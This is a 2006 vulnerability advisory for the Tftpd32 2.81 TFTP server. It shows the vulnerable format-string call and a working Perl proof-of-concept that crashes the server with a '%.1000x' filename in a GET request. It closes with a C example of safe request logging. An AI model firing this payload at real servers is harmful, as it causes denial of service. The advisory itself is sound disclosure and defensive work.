Critical-006.txt

Date: 25 Jan 2006 | Reported by: Critical Security | Type: packetstorm | Source: packetstormsecurity.com

Critical security advisory #006 for Tftpd32 2.81 Format String + DoS vulnerabilit

Code
`Critical security advisory #006  
Tftpd32 2.81 Format String + DoS PoC  
Critical Security - 22:03 2006.01.19  
Critical Security research: http://www.critical.lt  
Product site: http://tftpd32.jounin.net/  
Credits : Critical Security Team (www.critical.lt)  
Original Advisory: http://www.critical.lt/?vulnerabilities/200  
Due to incorrect use of format strings there is a possibility of remote code execution. You can trigger this vulnerability  
by sending a SEND or GET request with a specially formatted string. Vulnerable code:  
  
LEA ECX,DWORD PTR SS:[ESP+430]  
LEA EAX,DWORD PTR SS:[ESP+1C]  
PUSH ECX ; /Arglist  
PUSH EDX ; |Format  
PUSH EAX ; |s = 00E6F4E8  
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA  
  
Proof of concept exploit:  
http://www.critical.lt/research/tftpd32_281_dos.txt  
  
#!/usr/bin/perl  
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt  
use IO::Socket;  
$port = "69";  
$host = "127.0.0.1";  
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');  
$bzz = "\x00\x01" ; #GET  
$bzz .= "%.1000x\x00";  
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet  
$tftpudp->send($bzz);  
  
`
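
The defect shown in the disassembly is request data reaching the format argument of a printf-style call. As an added example (not code from the advisory or from Tftpd32; the function names and the log line layout are assumptions), this parses a TFTP read/write request, logs the filename only as a `%s` argument to a constant format string, and flags filenames containing `%` for review:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Added example; function names and log layout are assumptions. */

/* Return the NUL-terminated field at *off and advance past it,
   or NULL when no terminator exists inside the datagram. */
static const char *next_field(const uint8_t *pkt, size_t len, size_t *off)
{
    if (*off >= len) return NULL;
    const uint8_t *end = memchr(pkt + *off, 0, len - *off);
    if (end == NULL) return NULL;
    const char *s = (const char *)(pkt + *off);
    *off = (size_t)(end - pkt) + 1;
    return s;
}

/* Build a log line for an RRQ (opcode 1) or WRQ (opcode 2) datagram.
   Returns 0 if clean, 1 if the filename contains '%' (logged literally,
   flagged for review), -1 if malformed or too long for out. */
int log_tftp_request(const uint8_t *pkt, size_t len, char *out, size_t outlen)
{
    if (len < 4 || pkt[0] != 0 || (pkt[1] != 1 && pkt[1] != 2)) return -1;
    size_t off = 2;
    const char *file = next_field(pkt, len, &off);
    const char *mode = file ? next_field(pkt, len, &off) : NULL;
    if (file == NULL || mode == NULL || *file == '\0') return -1;
    /* Constant format string: remote bytes are only ever %s arguments,
       so "%.1000x" in a filename is copied, never interpreted. */
    int n = snprintf(out, outlen, "%s request for file <%s>, mode <%s>",
                     pkt[1] == 1 ? "Read" : "Write", file, mode);
    if (n < 0 || (size_t)n >= outlen) return -1;
    return strchr(file, '%') != NULL ? 1 : 0;
}

/* Constructed sample datagrams: opcode, filename, NUL, mode, NUL. */
static const uint8_t SAMPLE_OK[]  = "\x00\x01" "boot.img\0octet";
static const uint8_t SAMPLE_FMT[] = "\x00\x01" "%.1000x\0octet";

int main(void)
{
    char line[128];
    int rc = log_tftp_request(SAMPLE_FMT, sizeof SAMPLE_FMT, line, sizeof line);
    printf("rc=%d %s\n", rc, rc >= 0 ? line : "(rejected)");
    rc = log_tftp_request(SAMPLE_OK, sizeof SAMPLE_OK, line, sizeof line);
    printf("rc=%d %s\n", rc, rc >= 0 ? line : "(rejected)");
    return 0;
}
```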
